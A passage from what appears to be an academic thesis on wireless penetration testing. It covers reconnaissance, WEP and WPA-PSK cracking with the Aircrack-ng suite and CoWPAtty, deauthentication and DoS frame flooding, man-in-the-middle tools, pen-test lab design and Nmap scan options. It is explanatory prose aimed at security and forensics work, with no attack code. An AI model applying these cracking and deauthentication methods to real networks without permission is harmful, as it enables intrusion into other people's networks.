1. Enumerating the network and its coverage area via the information available
online and from personal contact and social engineering resources.
2. Planning the site survey methodology and attacks necessary to deploy against the
network.
28
3. Assembling, configuring, setting and checking all the hardware devices and
software tools needed to carry out the attacks.
4. Surveying the network site and determining the network boundaries and signal
strength along the network perimeter. Establish the best sites for stationary attacks
by finding a site where the signal strength and the signal to noise ratio (SNR) are
high, and the physical stealth factors such as site visibility, reach ability by
security guards and CCTV are low.
5. Analyzing the network traffic available. Determine whether the traffic is
encrypted or not, and how high the network load is.
6. Trying to break the discovered safeguards. This might involve by passing MAC
and protocol filtering, determining close ESSIDs, cracking WEP, and defeating
higher layer defensive countermeasures.
7. Scanning and discovering all detectable hosts on both the wired and wireless
networks.
8. Passively enumerating these hosts and analyzing security of protocols present on
the wireless and connected wired LANs.
9. Actively enumerating interesting hosts found and launching attacks against them
aimed at gaining top level accounts and privileges.
1.3.1 Determining What Others Know
The first formal step in the ethical-hacking methodology is to perform a high-
level network reconnaissance called foot printing. By looking at the targeted network
from an outsider’s perspective; the goal is to find out what is available to just about
anyone. The important information to search for is [Beaver 2005]:
29
• Radio Signal strength
• Specific SSIDs that are being broadcast
• IP addressing schemes
• Encryption method used such as WEP or WPA
• Hardware makes models
• Software versions
1.3.2 Mapping the Network
After finding out what the general public can find out about the network, the next
step is to create a network map to show how the network is laid out. It is important to
map the network from both inside and outside. This allows the ethical hacker not only to
see internal and external configuration information but also to see configuration
information specific to wireless radio waves that are transmitted both inside and outside
the network [Puneet 2008].
1.3.3 Scanning the System
The next step is to perform a port scanning or enumeration in the wireless network in
order to find more in-depth information about the system. Enumeration involves listing
and identifying the specific services and resources that a target offers. This detailed
information of the system gives the hackers what they need to try to exploit a ton of
potential vulnerabilities. By connecting to the ports on the system, the penetration tester
can obtain information, such as [Puneet 2008]:
• Acceptable usage policies and login warnings on banner pages.
• Software and firm wares versions.
• Operating-system versions
30
• Configuration of operating systems and applications.
Table 1.1 outlines the ports that are often found open and vulnerable to attack.
Table 1.1 Commonly Hacked Wireless Network Ports [Beaver 2005]:
Port Numbers Service Protocols
20 FTP data TCP
21 FTP control TCP
22 SSH TCP
23 Telnet TCP
25 SMTP (Simple Mail Transfer Protocol TCP
53 DNS(Domain Name Server) UDP
80 HTTP (Hypertext Transfer Protocol) TCP
110 POP3 (Post Office Protocol version 3) TCP
135 RPC/DCE end point mapper for Microsoft networks TCP, UDP
137,138,139 NetBIOS over TCP/IP TCP, UDP
161 SNMP (Simple Network Management Protocol TCP,UDP
443 HTTPS (HTTP over SSL) TCP
31
1.3.4 Performing a Vulnerability Assessment
After finding potential “holes” or “windows” into the wireless network, the next
step is to see whether bigger vulnerabilities exist. This can be done manually or using
automated tools such as Nessus or LAN Guard for Microsoft operating systems or
Baseline for Linux operating systems. These tools take a lot of the legwork out of
vulnerabilities assessment, giving the penetration tester more time to spend planning the
last step [Hassell 2004].
1.3.5 Penetrating the System
The last step of the ethical-hacking methodology is the system-penetration phase. This is
the true test of what systems and information can actually be compromised on the
wireless network. With all the information gathered about the wireless network, systems
running and vulnerabilities, the ethical hacker will try to access the resources on the
wireless network without having the right permission just like a malicious hacker will do.
All the attacks and tools described before will be used to do the penetration testing
[Hassell 2004].
WarDriving and Site Surveying
Wardriving is the activity to drive through any city or populated area, sampling
the airwaves for wireless access points. This activity is not illegal as long as the attacker
does not abuse the found networks’ resources and does not eavesdrop on data traffic.
However, site surveying is very different from casual wardriving. Site surveying is
considered to be the initial stage of penetration testing and security auditing. A surveyor
concentrates on a specified network and studies it in great detail. The site survey serves
four major security-related aims [Hurley 2007]:
32
• Finding out where the attackers can physically position themselves.
• Detecting rogue access points and neighbor networks.
• Base lining the interference sources to detect abnormal levels of interference in
the future, such as the interference intentionally created by a jamming device.
• Distinguishing network design and configuration problems from security-related
issues.
There are several wireless network mapping and signal monitoring tools available
in the market and most of them are free [Hassell 2004].
The most common tool for active scanning is NetStumbler which is close source
software that in order to do the active scanning it sends a probe request frame and waits
for probe response to come back. This probe response frames are dissected to show the
network ESSID, channel, the presence of WEP, signal strength, and supported bitrate
[Hurley 2007].
When NetStumbler locates a network, it records the following information [Siles
2007]:
• The signal, noise, and signal-to=noise ratio (SNR) of the discovery.
• The operating channel.
• Basic SSID which is actually the Mac address of the access point.
• Service Set Identifier (SSID) which is the unique identifier for the network.
• The access point’s name.
33
Another useful wireless network discovery tool is AiroPeek which is commercial
wireless network traffic and protocol analyzer from Wildpackets, Inc. AiroPeek offers
multiple features for monitoring and trouble shooting wireless LANs, including [Hurley
2007]:
• Full decodes of packets for 802.11a, 802.11b, and 802.11g.
• A security audit template with pre-defined filters.
• Scan by channel, ESSID or BSSID.
• Displays of data rate, channel and signal strength for each packet.
One of the most common open source tools for wardriving is Kismet. As mentioned
before, kismet is a universal 802.11 sniffer that went a long way from wardriving tool to
a full-blown protocol analyzer and an Intrusion detection System (IDS) suite. Kismet can
detect other scanning programs like NetStumbler, detect Cisco products by using CDP,
detect if there is IP blocking, and discover “closed,” “hidden,” SSIDs for access points
where SSID is disabled. Furthermore, with a GPS driver, kismet can map access point
locations [Hurley 2007].
WEP cracking
As described before, WEP is problematic since it only uses 24 bits for its IV value
range. Eventually the same IV will be used for different data packets. Keystreams,
therefore, are similar, and all an attacker needs to do is to collect data frames for an
extended period using the tools to analyze the traffic and then run a WEP cracking tool.
Another method is to collect unique IVs. With both of these methods the penetration
tester must collect a large number of WEP encrypted packets. A newer PTW attack
requires considerably fewer packets [Walker 2000].
34
FMS attacks are based on the weakness in WEP’s implementation of the RC4
encryption algorithm. To successfully crack the WEP key initially the penetration tester
must collect somewhere between 5 and 10 million packets to capture around 3,000 weak
IVs. Sometimes the attack can be successful with as few as 1,500 weak IVs, and
sometimes it will take more than 5,000 before the crack is successful [Walker 2000].
Another method also relies on the collection of a large number of encrypted
packets. The chopchop attack is a “method of chopping the last byte off the packet and
manipulating enables on to determine the key by collecting unique IVs instead” [Walker
2000]. The chopchop attack reduces the number of packets needed to be collected from
the millions to the hundreds of thousands [Walker 2000].
The third and newest attack is the Pychkine/Tews/Weinmann Attack (PTW) in
which it is no longer needed unique IVs. Therefore, a significantly reduced number of
packets would need to be collected to crack WEP as the IVs can be randomly chosen.
Using this technique, the success of probability of cracking WEP is 50 percent with as
few as 40,000 packets and reduces cracking time to mere minutes [Puneet 2008].
The most commonly used WEP cracking tool is AirSnort which has a very
intuitive interface and is straightforward to use. The number of packets required to crack
a WEP key is somewhere between 5 and 10 million packets, but once this amount of
packets has been gathered, it takes less than one second to identify the key [Vladimirov
2004].
35
Another popular tool is WepAttack which is an open source tool. WepAttack uses
brute-forcing or dictionary attacks to find the right key from the encrypted data pcap
dump file. The advantage of this tool is that it only requires one WEP-encrypted data
packet to start an attack. The possibility to crack WEP without collecting massive
amounts of encrypted data makes the dictionary attacks against 802.11 networks still
using WEP a serious threat [Vladimirov 2004].
Attacks against WPA
Unlike attacks against WEP, attacks against WPA do not require a large number
of packets to be collected. In fact, the attack can be done offline, without being in range
of the target access point. It is also important to note that attacks against WPA can be
successful only when WPA is used with a preshared key. WPA-RADIUS has no known
vulnerabilities. The main idea behind this attack is to capture the four-way Extensible
Authentication Protocol Over LAN (EAPOL) handshake. Then, using an extensive word
list in which each word has to be hashed 4,096 using the HMAC-SHA1 hash function. To
have a reasonable change of success, the preshared key should be shorter than 21
characters [Vladimirov 2004].
36
Denial of Service Attacks
Wireless networks are vulnerable to this type of attack mainly because of two
main reasons. The first one is the lack of frame authentication in 802.11 management
frames such as beacons, association requests, and probe response. The functionality in the
MAC layer of a these networks allows wireless systems to discover, join, and basically
roam free. This implicit trust among wireless systems makes it easy for attackers to spoof
legitimate devices and bring down individual hosts. The second reason is the lack of
physical boundaries for radio waves [Bellardo 2003].
The main objective of any denial of service attack (DoS) is to prevent users from
accessing network resources. The most common methods of triggering DoS attacks are to
flood a network with degenerate or faulty packets, crowding out legitimate traffic and
causing systems not to respond. Although this type of attacks can also be performed in
wired networks, wireless systems are particularly susceptible to DoS attacks because of
the way different layers of the OSI stack interact with one another [Hassell 2004].
An attack using the physical layer in a wireless network is much easier than to
attack the physical layer of a wired network because the physical layer of the wireless
network is the air, the general vicinity around a particular access point. Attackers do not
need to gain access to the internal corporate; they can begin their attack from a car or
even a nearby restaurant, depending on how the access point of the corporate is laid out.
Also, from a forensics investigator’s point of view it is more difficult to discern whether
or not a physical DoS attack has occurred since there is no real evidence [Bellardo 2003].
37
There are several ways to create a DoS attack. An attacker can manufacture a
device that will flood the 2.4 GHz spectrum with noise and illegitimate traffic. For
instance, wireless security cameras, Bluetooth systems, baby monitors, microwave ovens,
and even some poorly 2.4 GHz cordless phone can cause interference at 2.4 GHz, the
range that 802.11 b wireless networks operate [Hassell 2004].
At the data link layer of the OSI stack, again attacks are simpler to launch against
wireless systems than against traditional wired networks. One of the most common ways
to mount an attack against the data link layer is through the manipulation of diversity
antennas. Another issue with the data link layer is spoofed access points. Since, clients
are typically configured to associate with the access point with the strongest signal. An
attacker can simply spoof the SSID of an access point and clients will automatically
associate with it and pass frames back [Hassel 2004].
Although there are several ways to create a Denial of Service attack (DoS), one
common tool is a frame-generation tool such as Void11. This tool was designed for data
link layer DoS resilience testing. Void11 can generate three types of frames, namely,
deauthenticate, authenticate, and associate. The floods of authentication and association
requests can crash of freeze some access points by filling up the buffer space assigned for
handling and processing these requests [Beaver 2005].
38
Man-in-the-middle Attacks
Similar to DoS attacks, man-in-the-middle attacks on a wireless network are
significantly easier to mount than against wired networks. The reason is that typically
such attacks on a wired network require some sort of access to the network. Man-in-the-
middle attacks take two common forms: eavesdropping and manipulation. In
eavesdropping, an attacker just listens to a set of transmissions to and from different hosts
even though the attacker’s computer is not part of the transaction. On the other hand,
manipulation attacks would change the contents of the unauthorized receipt of data
stream to suit a certain purpose [Bayles 2007].
This attack can happen in various ways such as: ARP poisoning where the
attacker manipulates the operating system, router, and switch ARP tables in order to
spoof the victim’s MAC address. Another way is Port Stealing where an attacker can
spoof packets by setting the source address to his victim’s address and the destination
address to his own address. There are various tools that hackers use to create MITM
attacks. The most popular MITM tools are open source tools for the UNIX/Linux and
Windows platforms [Bayles 2007].
AirJack is a device driver or suit of device drivers for 802.11 (a/b/g) raw frame
injection and reception. This tool was originally made up of a custom driver for Prism II
chipset cards. The main functionality of AirJack is based around its ability to send
deauthenticate 8021.11 frames. The attack utilities included in AirJack contain a Layer 2
man-in-the-middle attack [Beaver 2005].
39
As shown, all these attacks and the tools used to perpetuate them is a very
important knowledge of the forensics investigator. By addressing all the how-to of all
these attacks and also, showing all the features of all the tools the forensics investigator
will gain a deep understanding of how to conduct an investigation and furthermore, to
determine what type of attack has been deployed in the wireless network [Hassell 2004].
40
2. NARRATIVE
The very idea of a wireless network introduces multiple venues for attack and
penetration that either much more difficult or completely impossible to execute with a
standard, wired network. Wireless networks only know the boundaries of their own signal
where streets, parks and nearby buildings all offer a virtual port into the wireless network.
There is a general misconception that only large enterprises are at risk from cracking.
This is a myth, but it is very prevalent. Large corporations are where the money and
sensitive data are. However, a common error is to consider small enterprises and even
home user networks to be off the crackers scope because they are not interesting and have
low value for an attacker. Small business and home networks provide the cracker with:
anonymous access, low probability of getting caught, free bandwidth, and the ease of
breaking in [Vladimirov 2004].
Security managers need to have an understanding of these issues in order to
overcome them and also, they need to know all the tools that are used by attackers when
conducting an attack on a wireless network. By reviewing how professional ethical
hackers deploy a wireless penetration testing and all the tools available in the market to
conduct an effective wireless investigation, a security manager will gain a deep
understanding of what tools should be used for specific situations. There are many tools
available for learning how to do penetration testing. However, few targets are available
with which to practice pen testing safely and legally [Bayles 2007].
41
Many people learn penetration tactics by attacking systems on the Internet.
Although this might provide a wealth of opportunities and targets, it is highly dangerous
because it is illegal. Many people have gone to jail or paid huge amounts of money in
fines, all for hacking Internet sites. Furthermore, for security managers, trying to learn on
their corporate live system is inadmissible [Bayles 2007].
The only real and safe option to those who want to learn penetration testing
legally is to create a penetration lab. However, there is the added difficulty of creating
real-world scenarios to practice against, especially for those who do not know what a
real-world scenario might look. This obstacle often is daunting enough to discourage
many from learning how to deploy a penetration test [Bayles 2007].
2.1 Setting Up a Penetration Test Lab
One of the biggest mistakes people make when developing a lab is that they use
systems connected to the internet or their corporate intranet. A lot of what occurs during a
penetration test can be harmful to networks and systems if the test is performed
improperly. The penetration tester can shut down the entire network, cutting the company
off from revenue, and negatively affecting the company public image with customers.
2.1.1 Isolating the Pent-test Lab
The best example for this point is what Robert Tappan Morris, who was a student
at Cornell University in 1988 [Bayles 2007].
42
Morris released what is considered to be the first worm on the Internet. “He
created the worm to try to discover how large the Internet was at the time, and as he has
stated his intentions were no malicious” [Bayles 2007]. However, the worm jumped from
system to system, copying itself multiple times, and each copy tried to spread itself to
other systems on the Internet creating a denial-of-service attack against the entire
Internet. The total estimated damage between $10 millions and $100 millions. Morris was
tried in a court of law and was convicted. With this example is clear that someone dealing
with anything remotely hazardous to the network should be extremely paranoid and think
on security first [Bayles 2007].
Since penetration testing can be a hazardous activity, it is vital that a penetration
test lab be completely isolated from any other network. This produces some problems,
such as having no internet connection to look up vulnerabilities and exploit information,
and download patches, application, and tools. However, to guarantee that nothing in the
network leaks out, the penetration tester must take every precaution to make sure network
does not communicate with any other network. Nevertheless this becomes problematic
when the network contains wireless appliances. How to isolate a pent-test lab with
wireless access from other networks? [Bayles 2007].
43
In a penetration test involving a wireless network, first the penetration tester
needs to gain access to the network. It does not matter whether that connection is via the
wireless portion of the network or a plug in the wall. All that matters is that access is
established. Once the access is accomplished, the penetration tester move on to selecting
targets using techniques that work over either wireless or wired networks. So, in order to
isolate a pen-test lab with wireless access, the penetration tester needs to have two
separate labs [Bayles 2007]. A wireless lab where the penetration tester practice breaking
into the wireless access point and another lab where the penetration tester conducts the
system attacks. That way, all future attacks are isolated and are not exposing other
networks [Bayles 2007].
However, in many situations in which wireless access point are in the vicinity of
the wireless test lab, the penetration tester must be extremely careful that the attacks
deployed are only in the pen-tester’s lab, and no other wireless network. On the other
hand, the good thing about wireless attacks is that the standard practice is to pinpoint the
attacks against the access point using the Media Access Control (MAC) address unique to
the wireless access point used in the lab [Bayles 2007].
2.1.2 Securing from Unauthorized Access
Once all the precautions to isolate the pen-test lab are done, the second step is to
secure the pen-test lab from all unauthorized access. Because the penetration test lab
should simulate the customer’s network as closely as possible, getting access to the pen-
test lab is almost as valuable as gaining access to the production network. Furthermore, it
is important to secure install disks and verify the integrity of all the files, and software
used in the pen-test lab.
44
The pen-tester effective way to verify the integrity of a file is by using a hash
function. Once the pen-tester has downloaded a file, he must verify that he has a true
copy of the file by conducting an MD5 hash against it, and comparing it to the file
author’s published value [Bayles 2007].
2.1.3 Managing Storage Devices
Another precaution that a pen-tester should have is to design a safe way to bring
data into the network. Once the pen-test lab is completely isolated, the only way to bring
any patches, codes or files onto the pen-test lab, is by using CDs, DVDs or thumb drives.
However, in order to prevent leaking of sometimes viruses that could have spread across
the pen-test lab network, these storage units should be on read-only mode. Also, all CDs
and DVDs should all be closed after transferring the desired data [Bayles 2007].
Furthermore, not labeling properly can become a huge problem, especially if
someone who is not part of the team picks a CD or DVD up which contains malicious
software. Finally, after finishing all the tests it is important to document all the findings.
A pen-tester should be careful to write, transport, and archive this information in a secure
manner. All other security efforts are meaningless if a malicious person can acquire the
final pen-test report with all the glaring deficiencies and exploitable vulnerabilities
summarized with all the specific steps needed to bring the target network to its knees
[Bayles 2007].
45
2.2 Types of Penetration Test labs
Before start building the pen-test lab it is important to ensure that the pen-tester
has the right equipment for the task. Knowing exactly what kind of lab the pen-tester
needs is a task that is going to save time and money. There are five possible types [Bayles
2007]:
• The virtual pen-test lab
• The internal pen-test lab
• The external pen-test lab
• The project-specific pen test lab
• And ad hoc lab
2.2.1 Virtual Pen-Test Lab
The virtual pen-test lab is the smallest the pen-tester can build. It is just for
starting out learning how to conduct a penetration testing. If the main goal of the project
is related to how to attack a system and not worried about navigating through a network,
using virtualization software that can emulate multiple operating systems will provide a
wealth of possibilities. Virtualization software has become quite complex and versatile in
the past few years [Bayles 2007].
46
However, some of today’s more sophisticated viruses check for virtualization
before launching their malicious payload. This means that attacks using this type of
viruses to a virtual server will not work or the pen tester will not get the expected results.
Since virtual pen-test lab cannot reflect the real-world network in today’s corporate
environment, most beginner labs consist of two systems connected through a router. One
system is the target, the second system is the penetration tester’s machine, and the router
is there to provide network services, such as domain name system (DNS) and Dynamic
Host Configuration Protocol (DHCP) [Bayles 2007].
2.2.2 Internal Pen-Test Lab
This set up, is called internal pen-test lab because the penetration tester is given
internal network access. The objective of this lab is to see exactly what vulnerabilities
exist on the corporate network, not to see whether someone can break into the network. It
is assumed that someone who has enough time on his hands will eventually succeed in
getting into the network. The main goal with an internal penetration test is to find out
exactly what an intruder might grab once he is in [Bayles 2007].
47
Figure 2.1 A Sample Internal Pen-test lab
2.2.3 External Pen-Test Lab
In order to test vulnerabilities related to how an intruder can get into the corporate
network the test-lab to use is the external pen-test lab. This type of lab follows the
principle of defense in depth. That means that the lab needs to include a firewall as a
bare minimum. Designed to keep bad guys out, a firewall can be a difficult boundary to
get past. However, there are exceptions. Often it becomes necessary for firewall
administrators to create gaps in the firewall, allowing traffic to enter and leave the
network unfettered. Sometimes holes are left open by accident, or because there is an
expectation of future need. Figure 2.2 shows a sample of an external Pen-test lab [VAC
2008].
48
Figure 2.2 A Sample External Pen-test Lab
In external penetration tests, the objective is to see whether there is a way to
penetrate past various obstacles in the network, and gain access to a system behind these
defenses. Other defenses include the use of a Demilitarized Zone (DMZ), proxies, the
Network Address Translation (NAT) mechanism, network intrusion detection systems,
and more. Of course, the more defenses, the closer the pen-tester gets to mimicking real-
world corporate networks [VAC 2008].
2.2.4 Project-Specific Pen-test lab
Sometimes it is imperative to create an exact replica of the target network. This
might be necessary because the production network is so sensitive that management
cannot risk any downtime. In this case, the pen-test team needs access to the same
equipment as what is available in the target network. Project-Specific Pen-test labs are
rarely created because of their expensive cost, but they do exist. Extreme attention is
needed when building this type of labs. It is imperative to replicate accurately the
production network since the pen-tester might get invalid test results if the test lab is not
exactly the same as the production network [VAC 2008].
49
2.2.5 Ad Hoc Lab
The last type of lab is called the Ad Hoc Lab and often this lab is used to test one
specific thing on a server such as a new patch, or traffic needs to be sniffed to see
whether there are any changes to what is being sent. This type is used frequently even
when a more formal lab setup is required. An ad hoc network is really a shortcut, and it
should be an exception to standard practices. A formal process should exist to determine
exactly which type of lab is needed for each penetration test project [VAC 2008].
2.3 Pen-Test Lab Description
For the purpose of this project, the external pen-test lab and the internal pen-test
lab were used. The external pen-test lab was used to prove how wireless network can
become a backdoor to the main network, and the internal pen-test lab was used to address
the most common configuration flaws. These two labs were created at the Network
Security Lab following all the steps described above. After defining which test labs were
suitable for the project, the second step was to select the right hardware.
2.3.1 Hardware Description
One of the most important hardware components needed for penetration testing is
the wireless card. The main technical challenges associated to wireless penetration testing
are due to the intrinsic nature of radio frequency (RF) communications and the
complexity of the physical medium and the 802.11 specifications [Arbaugh 2003].
Standard wireless equipment only contains a single radio component; therefore, it is only
capable of listening to a specific channel in a given moment.
50
Although there are some tools that have used a technique called channel hopping
to scan the whole frequency spectrum and sample all the different channels, these tools
can only listen for a few milliseconds in each channel. As mentioned before the Intel
PRO/Wireless 3945 802.11 a/b/g wireless card is the wireless card used in this project.
Bellow table 2.1 shows all the specifications and features of this wireless card [VAC
2008].
Table 2.1 Intel PRO/Wireless 3945 802.11 a/b/g wireless card specifications
Main Specifications
Product Description
Intel PRO/Wireless 3945ABG Network Connection - network adapter
Device Type Network adapter
Form Factor Plug-in card
Interface (Bus) Type Mini-PCI Express
Data Link Protocol IEEE 802.11b, IEEE 802.11a, IEEE 802.11g
Compliant Standards
IEEE 802.11b, IEEE 802.11a, IEEE 802.11g, IEEE 802.1x, Wi-Fi CERTIFIED
Networking
Spread Spectrum Method OFDM
Data Transfer Rate 54 Mbps
Line Coding Format DBPSK, DQPSK, CCK, 64 QAM, BPSK, QPSK, 16 QAM
Miscellaneous
Encryption Algorithm LEAP, MD5, AES, 128-bit WEP, 64-bit WEP, TLS, PEAP, TTLS, TKIP, WPA, WPA2
Compliant Standards UL, cUL, IEC 60950, CB
51
The Intel PRO/Wireless 3945 802.11 a/b/g wireless card is able to listen to
multiple channels in a given moment. However, this card does not have the capability to
inject packets for the packet injection attack. In order to overcome this technical handicap
special drivers were installed. Another key component is the Wireless Access point that
was used during the penetration testing. The model chosen was the Linksys WAP54G.
Table 2.1 describes the main specifications of this Access point.
Table 2.2 Access Point Specifications
Specifications
Model Number WAP54G
Standards
IEEE 802.11g, IEEE 802.11b IEEE 802.3, IEEE 802.3u
Ports/Buttons
One 10/100 Auto-Cross Over port, power port, reset and SES button
Cabling Type RJ-45
Security Features
WPA, Linksys Wireless Guard, WEP Encryption MAC filtering, SSID Broadcast enable/disable
WEP key bits 64/128-bit
This wireless access point supports data rates up to 54 Mbps, and also is
compatible with existing 802.11b devices. The WAP54G wireless router supports WPA
security, and 64/128 bit WEP Encryption. Also, wireless bridging, wireless repeater,
MAC filtering and event logging. Once the wireless card and the Wireless access point
used were described, the second step is to define the software tools that were used [VAC
2008].
52
2.3.2 Software Description
All the tools used in this project are Open Source tools available in the Backtrack
3.0 Live CD, and others downloaded from different URLs. Backtrack is the most top
rated Linux live distribution focused on penetration testing. With no installation
whatsoever, the analysis platform is started directly from the CD-Rom and is fully
accessible within minutes. Backtrack has a long history and was based on many different
Linux distributions until finally being based on a Slackware Linux distribution.
Every package, kernel configuration and script is optimized to be used by security
penetration testers. Also, patches and automation have been added, applied or developed
to provide a neat and ready to-go environment. Figure 2.3 shows Backtrack 3.0
Figure 2.3 Backtrack 3.0 Desktop
53
Backtrack 3.0 is the latest version. This new version support more and newer
hardware as well as provide more flexibility and modularity. Also, this new version has
more than 300 different up-to-date tools which are logically structured according to the
work flow of security professionals. Furthermore, backtrack 3.0 is aligned to penetration
testing methodologies and assessment frameworks (ISSAF and OSSTMM). This is
helpful during daily reporting tasks.
The first tool used is NetStumbler. It is free, easy to install and simple to
use. Netstumbler is a tool for Windows that allows the pen-tester to detect Wireless Local
Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It also provides radio
frequency (RF) signal information and other related to combining computers and radios.
Netstumbler sends out a probe request about once a second, and reports the responses
with information such as the Service Set Identifier (SSID) and the Media Access Control
(MAC) numbers. This is known as Active Scanning. Figure 2.4 displays the main screen
of Netstumbler [Bayles 2007].
54
Figure 2.4 NetStumbler Main Screen
One of the weaknesses of Netstumbler is its inability to detect Wireless LANs
utilizing hidden SSIDs. However, it does include a very useful graphical representation of
signal strength (indicated in green) and noise ratio (indicated in red) over time, which is
useful for direction finding Wireless LANs (Figure 2.5). Also, with a GPS device a Net
Stumbler can create a file in the .ns1 format which can be imported into Microsoft’s
MapPoint software to produce a graphic representation of any Wardriving or Site Surveys
[Bayles 2007].
55
Figure 2.5 Graphical representation of Signal Strength
In order to get the wireless access points who were not broadcasting their SSID,
the kismet tool was used. Kismet is an 802.11 layer two wireless network detector,
sniffer, and intrusion detection system which comes with the Backtrack 3.0 Live CD.
Kismet will work with any wireless card which supports raw monitoring (rfmon) mode,
and can sniff 802.11b, 802.11a, and 802.11g traffic [Hurley 2007].
It identifies networks by passively collecting packets and detecting standard
named networks, hidden networks, and inferring the presence of nonbeaconing networks
via data traffic. Also, kismet has a very powerful user interface that provides a large
amount of information about each access point identified. Figure 2.6 is the kismet main
interface [Hurley 2007].
56
Figure 2.6 The Kismet Interface
The network list can be sorted by 14 different ways with the sort options. Once
the sort method is defined, additional information about each network can be found.
Networks in red are networks that the access point is using factory default settings.
Networks in yellow have the access points that are broadcasting without any encryption
method. The green ones are secure networks with an encryption method in place. The
blue ones are access points that are not broadcasting their SSID [Hurley 2007].
As mentioned before Kismet is a passive detector, however it captures packages
of all the wireless access points in range. This can be dangerous because no one is
supposed to be capturing packets. NetStumbler and Kismet were used in the project for
Wardriving and Site Surveying [Hurley 2007].
57
With all the information collected from those two tools the second step is to
attempt to crack the encryption method used by the access point if any used. For this
purpose the Aircrack-ng 1.0 set of tools was used. Again, this is part of the Backtrack 3.0
Live CD. Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can
recover keys once enough data packets have been captured. It implements the FMS attack
with some optimizations like KoreK attacks. Also, in the latest version it implements the
all-new PTW attack, thus making the attack much faster compared to other WEP
cracking tools [Hurley 2007].
Airodump-ng which is part of the Aircrack-ng suite of tools is used for packet
capturing of raw 802.11 frames. However, this tool is particularly suitable for collecting
WEP initialization vector (IVs) for the intent of using them with Aircrack-ng. Airodump-
ng can detect all the near access points, and then it can be set to listen to one specific.
Furthermore, to minimize disk space used by the capture, it can be set to only stores the
initialization vectors and not the full packet. Yet, in order to crack WPA or use the PTW
attack on WEP, the full packet is needed [Hurley 2007].
If no traffic is being generated by the network, Aireplay-ng tool can be used to
inject frames. There are different attacks that are implemented by this tool. The first one
is causing deauthentications for the purpose of capturing WPA handshake data,
recovering a hidden ESSID, generating ARP request. This attack sends disassociate
packets to one or more clients which are currently associated with a particular access
point. Since, in order to crack WPA-PSK it is only needed the four-way (EAPOL)
handshake. By forcing an associated client to reconnect, the attacker collects these four
packets [Hurley 2007].
58
Once these packets are collected the tool used to crack WPA-PSK was CoWPAtty
by Joshua Wright which is a tool for automating the offline dictionary attack that WPA-
PSK networks are vulnerable to. CoWPatty goes through the process of finding the
Primary Temporary Key (PTK) for every word or phrase in a dictionary and checking to
see if that PTK generates the correct Message Integrity Check (MIC) value for a given
packet. From the four way handshake packets it firsts finds the SSID of the network
which is needed in the hashing algorithm to find the Primary Master Key (PMK). To find
the Primary Temporary Key (PTK), the random values and MAC addresses that are used
in the four way handshake are needed. Once they are found, they are used with the PMK
to find a PTK value [Hurley 2007].
Finally this value can be used to find the MIC of a packet. If the calculated MIC
matches the MIC given in the packet, the correct passphrase has been found. If not the
process is repeated with the next dictionary word/phrase. In order to speed up the process
by three orders of magnitude a penetration tester can use precomputed hash tables. These
tables can be found in the Internet in both 7 GB and 34 GB varieties. The 7 GB tables
were created using a dictionary file of 172,000 words and the 1,000 most common
SSIDs. If the SSID of the network it is not among the 1,000 most common the
penetration tester can generate a table using the genpmk tool included with CoWPatty. If
the passphrase it is not included in the dictionary list the attack will fail. Furthermore, this
attack is totally useless if there are no associated wireless clients [Hurley 2007].
59
The second attack is fake authentication which allows the penetration tester to
perform the two types of WEP authentication (Open System and Shared Key) to associate
with the access point. This is useful when an associated MAC address is needed and there
is currently no associated client. If there are associated clients the interactive packet
replay attack can be used. This attack allows the attacker to choose a specific packet for
replaying. The attack can obtain packets to replay from two sources. The first being a live
flow of packets, and the second being from a cap file. Any packet captured cannot be
used to replay, only certain packets can be replayed successfully which means that it is
accepted by the access point and cause a new initialization vector to be generated [Hurley
2007].
Nevertheless, with certain tools such as packetforge-ng the penetration tester can
generate packets and store them in a cap file. Since, Aireplay-ng can read from a file
containing a packet previously created with packetforge-ng the penetration tester can
successfully inject packets even if no traffic is being generated by any associated client.
A better way to generate new IVs is with the ARP request replay attack. In order to
deploy this attack an ARP packet is needed. Once, the program listens for an ARP packet
then retransmits it back to the access point. This, in turn, causes the access point to repeat
the ARP packet with a new IV. Then, the program retransmits the same ARP packet over
and over [Hurley 2007].
60
As mentioned before, packetforge-ng can generate any type of packets. However,
in order to do so, it needs the PRGA (Pseudo random generation algorithm). In order to
recover the PRGA Aireplay-ng needs at least one data packet to be received from the
access point. Then, it attempts to send ARP and/or LLC packets with known content to
the access point. If the packet is successfully echoed back by the AP a larger amount of
keying information can be obtained from the returned packet. This cycle is repeated
several times until 1500 bytes of PRGA are obtained. Once the PRGA is written to a file,
packetforge-ng can generate successfully generate valid packets [Hurley 2007].
Once the pen-tester has access to the wireless network, the next step is to identify
the specific services and resources that a target offers. The enumeration process
encompasses the port scanning, service identification, and fingerprinting attacks.
Although there are many different port scanners, they all operate in much the same way.
The most common type of scan uses the TCP SYN flag which appears in the TCP
connection sequence or handshake [Hassell 2004].
This type of scan begins by sending a SYN packet to a destination port. The
target receives the SYN packet, responding with a SYN/ACK response if the port is open
or an RST if the port is closed. Because the TCP handshake did not complete, the service
on the target does not see a full connection and will usually not log. The most common
tools associated with enumeration include Nmap, Amap, and LanGuard [Hassell 2004].
61
Other type of port scans uses various TCP flag set such as FIN, PUSH and URG.
Different systems respond differently to these packets, so there is an element of OS
detection when using these flags. However, the main purpose is to bypass access controls
that specifically key on connections initiated with specific TCP flags set. Table 2.3
summaries the common Nmap options along with the scan types initiated and expected
response [Hassell 2004].
Table 2.3 Nmap Options and Scan Types [Beaver 2005]
Nmap Switch
Type of packet Sent
Response if Open
Response if Closed Description
"-sT" OS-based connect()
Connection Made
Connection Refused or Timeout
Basic nonprivileged scan type
"-sS" TCP SYN Packet SYN/ACK RST
Default scan type with root privileges
"-sN"
TCP packet with no flags
Connection Timeout RST
Designed to bypass nonstateful firewalls
"-sV" Subprotocol- specific probe N/A N/A
Used to determine service running on open port; uses service database.
"-O"
Both TCP and UDP packet probes N/A N/A
Uses multiple methods to determine target OS/ firmware version
62
3. SYSTEM RESEARCH
There were created two pen-test labs for the purpose of deploying a penetration
testing methodology. The first one is an external pen-test lab, and the second is an
internal pen-test lab.
3.1 External pen-test lab
In an external pen-test lab the goal is to determine whether it is possible to
penetrate the network without having the permissions to do so [Beaver 2005]. As
mentioned before in this type of labs the defense in depth principle is followed. The
layout of the network is:
Figure 3.1 External Pen-test Lab
The first scenario was designed to be the most insecure of all where the access
point was set with no security at all. “There have been reported many cases where
companies have been attacked through a wireless access point installed without the
consent of the security manager “[Beaver 2005].
63
The access point attacked was unencrypted and the SSID of the network was
visible. In order to find if an employee has set a wireless point the tool used was
